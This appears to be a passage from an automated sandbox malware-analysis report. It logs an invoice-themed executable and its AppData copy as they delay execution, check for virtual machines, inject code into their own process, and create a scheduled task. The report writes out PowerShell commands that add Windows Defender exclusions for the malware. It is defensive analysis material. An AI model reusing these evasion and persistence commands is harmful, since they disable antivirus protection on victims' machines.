Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594180
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594061
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593953
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593844
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593734
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593625
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593502 Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599560
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599432
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598387
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598266
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597594
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595294
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595058
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6589
Source: C:\Users\user\Desktop\3140, EUR.exe Window / User API: threadDelayed 7175
Source: C:\Users\user\Desktop\3140, EUR.exe Window / User API: threadDelayed 2655
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Window / User API: threadDelayed 2161
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Window / User API: threadDelayed 7694
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 6912 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 7468 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300 Thread sleep count: 177 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6264 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7448 Thread sleep count: 7175 > 30
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7448 Thread sleep count: 2655 > 30
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598007s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597786s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597560s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597334s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597212s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597045s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596717s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596391s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596266s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596141s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596031s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595922s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595812s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595703s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595594s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595484s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595375s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595266s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595141s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595016s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -594865s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -594484s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -594180s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -594061s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593953s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593844s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593734s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593625s >= -30000s
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593502s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7316 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7740 Thread sleep count: 2161 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599560s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7740 Thread sleep count: 7694 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599432s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599174s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598718s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598387s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598266s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597594s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597375s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595294s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595174s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595058s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594391s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594281s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594172s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594062s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599437
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599219
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599000
Source: lkuPOyvaWlIu.exe, 00000009.00000002.1801962892.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 3140, EUR.exe, 00000008.00000002.4120490815.00000000013A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllubli
Source: lkuPOyvaWlIu.exe, 00000009.00000002.1801962892.0000000000D50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: lkuPOyvaWlIu.exe, 0000000F.00000002.4120391587.0000000001496000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29548 LdrInitializeThunk, 15_2_06F29548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\3140, EUR.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\3140, EUR.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Memory written: C:\Users\user\Desktop\3140, EUR.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory written: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Users\user\Desktop\3140, EUR.exe VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\3140, EUR.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
